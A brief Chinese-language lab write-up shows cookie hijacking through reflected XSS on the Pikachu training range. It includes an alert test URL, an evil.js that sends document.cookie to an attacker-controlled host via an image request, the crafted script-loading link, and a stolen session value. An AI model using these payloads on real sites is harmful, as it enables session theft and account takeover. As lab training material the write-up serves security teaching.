pikachu靶场—cookie劫持
一.劫持的原理
? 利用XSS漏洞,对存在漏洞的位置进行测试,并写出payload。
? 将构造好的链接发送给用户,用户点击后就会将自己的cookie发送到攻击者提前布好的网站。
? 这次使用的是pikachu靶场,里面就存在着XSS相关的漏洞。
二、劫持的过程
-
环境说明
- 服务器: windows 7(pikachu靶场) IP:192.168.254.136
- 用户: windows 10 IP:192.168.254.149
- 攻击者的网站: windows 7 IP:192.168.254.135
-
攻击过程 1)反射型XSS(get) 2)构造测试payload http://192.168.254.136/pikachu/vul/xss/xss_reflected_get.php?message=<script>alert(1111)</script>&submit=submit
发现浏览器弹框了,显示了1111,正好是alert的内容,说明这个位置存在xss漏洞。 3) 提前在攻击者的网站下写好的js代码(evil.js) var img=document.createElement("img");
img.src="http://192.168.254.135/log?"+escape(document.cookie);
document.body.appendChild(img);
4) 模拟用户点击构造好的payload http://192.168.254.136/pikachu/vul/xss/xss_reflected_get.php?message=<script src=http://192.168.254.135/evil.js></script>&submit=submit
? 5)查看获取的cookie
通过对比发现成功获取了用户了cookie
r68phbvh9g1pll8tnk4orouk8d
|